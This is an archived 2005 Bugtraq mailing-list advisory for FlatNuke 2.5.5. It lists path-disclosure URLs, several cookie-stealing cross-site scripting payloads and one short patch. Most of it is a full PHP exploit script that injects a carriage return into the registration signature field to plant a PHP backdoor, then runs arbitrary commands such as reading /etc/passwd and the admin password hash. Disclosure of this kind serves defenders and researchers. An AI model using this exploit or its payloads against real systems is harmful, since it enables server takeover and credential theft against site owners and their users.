[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    FlatNuke 2.5.5 (possibly prior versions) remote commands
From:       retrogod () aliceposta ! it
Date:       2005-08-04 23:03:49
Message-ID: 20050804230349.27626.qmail () securityfocus ! com
[Download RAW message or body]

0.34 2005-08-05

FlatNuke 2.5.5 (possibly prior versions) remote commands execution / cross site \
scripting / path disclosure (by rgod) (release date: 2005-07-20 )

software:
author site: http://flatnuke.sourceforge.net/


path disclosure:

http://[target]/[path]/themes/butterfly/structure.php

supllying a null byte to mod parameter
http://[target]/[path]/index.php?mod=/%00/Vecchi_sondaggi

supplying reserved device names to mod parameter
http://[target]/[path]/index.php?mod=prn
http://[target]/[path]/index.php?mod=nul
http://[target]/[path]/index.php?mod=aux
etc.

(1) cross site scripting:
http://[target]/[path]/themes/butterfly/structure.php?bodycolor="><script>alert(document.cookie)</script>
 http://[target]/[path]/themes/butterfly/structure.php?backimage="><script>alert(document.cookie)</script>
 http://[target]/[path]/themes/butterfly/structure.php?backimage=whatever&theme="><script>alert(document.cookie)</script>
 http://[target]/[path]/themes/butterfly/structure.php?backimage=whatever&bodycolor="><script>alert(document.cookie)</script>
 http://[target]/[path]/themes/butterfly/structure.php?logo="><script>alert(document.cookie)</script>


(2) if register_globals in php.ini are off (often), cross site scripting:

http://[target]/[path]/forum/footer.php?admin="><script>alert(document.cookie)</script>
 http://[target]/[path]/forum/footer.php?admin_mail="><script>alert(document.cookie)</script>
 http://[target]/[path]/forum/footer.php?back="><script>alert(document.cookie)</script>
 http://[target]/[path]/footer.php?admin="><script>alert(document.cookie)</script>
http://[target]/[path]/footer.php?admin_mail="><script>alert(document.cookie)</script>


patch for (2):
replace at line 15: if (eregi("footer.php",$PHP_SELF))
with:               if (eregi("footer.php",$SERVER['PHP_SELF'])) 

(3) cross site scripting: a user can send news to the admin to evaluate, and in the \
message body insert evil javascript code, so when admin opens news sent, javascript \
will run. Try this in message body:

<script>alert(document.cookie)</script>

remote commands execution: 

when a user registers, flatnuke creates a username.php file in /forum/users \
directory, like this:

<?
#b0d7282f4b6f1e09f69c42f148055b5a
#jimihendrix
#jimihendrix@email.com
#http://www.asite.com
#artist
#whereimfrom
#images/clanbomber.png
#signature
#0
?>

if you call the file, nothing is executed, lines are commented with # char

but when you register you can insert  ASCII char(13) in records, so if you put it in \
signature, you have

<?
#b0d7282f4b6f1e09f69c42f148055b5a
#jimihendrix
#jimihendrix@email.com
#http://www.asite.com
#artist
#whereimfrom
#images/clanbomber.png
#
signature
#0
?>

now if 'signature' is a php instruction like this: 

system($HTTP_GET_VARS[command]);

you have a backdoor on target system and launch commands, example:

http://[target]/[path_to_flatnuke]/forum/users/[username].php?command=ls%20-la

to list directories...

http://[target]/[path_to_flatnuke]/forum/users/[username].php?command=cat%20/etc/passwd


to see /etc/passwd file

http://[target]/[path_to_flatnuke]/forum/users/[username].php?command=cat%20admin.php

to see md5 hash admin password...

this is my php proof of concept exploit code with proxy support:

<?php
/* Aug 2005, 4th
   Flatnuke 2.5.5 (possibly prior versions) remote code execution
   by rgod
   site: http://rgod.altervista.org

   thanks to UlisseHacker... :)

   make these changes in php.ini if you have troubles
   with this script:
   allow_call_time_pass_reference = on
   register_globals = on						       */

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo '<head><title>FlatNuke 2.5.5 remote commands execution</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
      <style type="text/css">
      <!--
      body,td,th {color: #00FF00;}
      body {background-color: #000000;}
      .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
      .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
	       font-weight: bold;
	       font-style: italic;
              }
      -->
      </style></head>
      <body>
<p class="Stile6">FlatNuke 2.5.5 (possibly prior versions) remote commands \
execution</p> <p class="Stile6">a script by rgod at <a \
href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p> \
<table width="84%" >  <tr>
    <td width="43%">
     <form name="form1" method="post" \
action="'.$SERVER['PHP_SELF'].'?path=value&host=value&port=value&command=value&proxy=value">
  <p>
       <input type="text" name="host">
      <span class="Stile5">hostname (ex: www.sitename.com) </span></p>
      <p>
        <input type="text" name="path">
        <span class="Stile5">path (ex: /flatnuke/forum/ or /forum/ just /) \
</span></p>  <p>
      <input type="text" name="port">
        <span class="Stile5">specify a port other than 80 (default value) </span></p>
      <p>
      <input type="text" name="command">
        <span class="Stile5">a Unix command, example: ls -la to list directories, cat \
/etc/passwd to show passwd file </span></p>  <p>
      <input type="text" name="proxy">
        <span class="Stile5">send exploit through an HTTP proxy (ip:port)  \
</span></p>  <p>
          <input type="submit" name="Submit" value="go!">
      </p>
    </form></td>
  </tr>
</table>
</body>
</html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
			    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
			    }

echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

if (($path<>'') and ($host<>'') and ($command<>''))
{
if ($port=='') {$port=80;}
$data="op=reg&nome=jimyhendrix&regpass=jimihendrix&reregpass=jimihendrix&anag=jimihend \
rix&email=jimihendrix@email.com&homep=".urlencode('http://www.asite.com')."&prof=artis \
t&prov=whereimfrom&ava=clanbomber.png&url_avatar=&firma=".chr(13).urlencode('system($HTTP_GET_VARS[command]);');


if ($proxy=='')
       {$packet="POST ".$path."index.php HTTP/1.1\r\n";}
else
       {
        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);
        if ($c==0) {
                    echo 'check the proxy...<br>';
	            die;
	           }
         else
        {$packet="POST http://".$host.$path."index.php HTTP/1.1\r\n";}
        }

$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, \
application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: \
http://".$host.":".$port.$path."index.php?op=vis_reg\r\n"; $packet.="Accept-Language: \
it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;

show($packet);
if ($proxy=='')
           {$fp=fsockopen(gethostbyname($host),$port);}
           else
           {$parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $fp=fsockopen($parts[0],$parts[1]);
	    if (!$fp) { echo 'No response from proxy...';
			die;
		       }

	    }
fputs($fp,$packet);
$data='';
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))
   {
      $data.=fread($fp,1);
   }
fclose($fp);
echo nl2br(htmlentities($data));
if ($proxy=='')
       {$packet="GET ".$path."users/jimyhendrix.php?command=".urlencode($command)." \
HTTP/1.1\r\n";} else
       {
        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);
        if ($c==0) {
                    echo 'check the proxy...<br>';
	            die;
	           }
         else
        {$packet="GET \
http://".$host.$path."users/jimyhendrix.php?command=".urlencode($command)." \
HTTP/1.1\r\n";}  }

$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, \
application/x-shockwave-flash, */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
if ($proxy=='')
           {$fp=fsockopen(gethostbyname($host),$port);}
           else
           {$parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $fp=fsockopen($parts[0],$parts[1]);
	    if (!$fp) { echo 'No response from proxy...';
			die;
		       }

	    }
fputs($fp,$packet);
$data='';

if ($proxy=='')
{    $data='';
     while (!feof($fp))
     {
      $data.=fgets($fp);
     }
}
else
{
$data='';
   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))
   {
      $data.=fread($fp,1);
   }

}

fclose($fp);

if (eregi('HTTP/1.1 200 OK',$data))
    {echo 'Exploit sent...<br> If Flatnuke is unpatched and vulnerable <br>';
     echo 'you will see '.htmlentities($command).' output inside HTML...<br><br>';
    }
else
    {echo 'Error, see output...';}
echo nl2br(htmlentities($data));
}

?>


sorry for my bad English,

rgod 
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it


(a thanks to Ulissehacker, http://www.pollohacker.tk for his help...)


original advisory: http://www.rgod.altervista.org/flatnuke.html


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic